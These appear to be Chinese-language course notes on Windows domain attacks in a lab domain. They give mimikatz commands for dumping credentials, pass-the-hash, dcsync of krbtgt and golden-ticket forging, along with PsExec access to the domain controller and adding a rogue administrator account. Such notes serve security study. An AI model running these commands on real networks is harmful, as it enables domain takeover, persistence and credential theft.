内网穿透（二）

域 （网吧网管就是域控）
控制端 -> 客户端 （控制端 可以控制 客户端）域（分上下级）
默认是工作组（人人平等，谁也控制不了谁） systeminfo work
（制作域：管理工具-服务器管理器-角色-添加角色-域服务-下一步-安装-域服务安装向导-下一步
加入域：计算机右键-属性-计算机名称-更改设置-域，把DNS改成域控的DNS，域控的账号密码）
核心功能：域控账号可以登录域内任意主机（依靠票据Kerberos认证协议）
如果Domain显示名称，大概率是域控，如果是数字代码（例如A1），基本上是域里的机子
如果抓到密码是密文，需要用哈希传递的方法（我们现在有密文密码，直接构建密文密码去登录）
mimikatz
sekurlsa::logonpasswords 抓取密码
sekurlsa::pth /user:administrator /domain:”zkaq.cn” /ntlm:61465a991b168727b65b3644aab823cd
user:登陆用户 domain:域地址 ntlm:密文加密值
然后会弹出cmd框 dir \WIN-D6PMU0BTMC1.zkaq.cn\c$ 【查看域控C盘】（域控名.域控）（\为UNC路径，共享文件）
cd 路径
PsExec.exe \域控地址WIN-D6PMU0BTMC1.zkaq.cn cmd （获取域控权限）
拿到域控后可以直接执行命令，添加账号
net user abc A1B2C3!Qa /add
net localgroup administrators abc /add
添加完账号后可以直接连接域控了（实战不建议添加账号，太明显，所以需要票据）
票据：通行证，只要有对的票据，域里面的机器可以无密码登录
依靠KDC密钥分发中心
域控的账号密码去登录页域主机
域主机检测域控登录的账号密码对不对，域主机->KDC（存放了域控主机的账号密码（KDC密码）来验证）KDC一般在域控上
黄金票据（域控的密码）：利用KDC账号做成一个票据，然后可以直接登录，不会因为域控的登录账号密码的变化而变化，
（相当于搞了张假的通行证，方便长期控制，正常情况下，KDC也会偶尔登录域主机，所以很难分辨出来，使用黄金票据，域内主机会认为你就是KDC直接放行）

制作黄金票据：
1.抓取KDC账号密码
cd 路径
privilege::debug
lsadump::dcsync /user:krbtgt 获取krbtgt的密码 [mimikatz 会模拟域控，向目标域控请求账号密码信息]
提取出里面的sid和hashNTLM (Sid 里面的-502去除)
kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857 /krbtgt:1176ad25a126d316ed5ea4b60b3d71dd /ticket:administrator.kiribi （生成票据名） [制作票据]
把票据拖到目标主机
kerberos::ptt administrator.kiribi [加载票据]
做票据（任何机器上都可以做，核心是需要有制作票据的东西）
dir \WIN-D6PMU0BTMC1.zkaq.cn\c$
PsExec.exe \域控地址WIN-D6PMU0BTMC1.zkaq.cn cmd

通过SQL注入-getshell-提权（加入管理员）-内网穿透（正向连接 reg）-3389上了第一台机器（不在域内）-抓取账户名和密码（等到明文密码）-撞库（登录第二台机器）（在域里，域控账户密码可以登录任意域主机，登陆过所以可以在这个机器抓到账户米密码，但是抓到域控密文）-哈希传递（拿到域控权限）-（长期控制）做了黄金票据（KDC认证）（可以登录任何域里的主机，域的账户密码被修改了也没关系）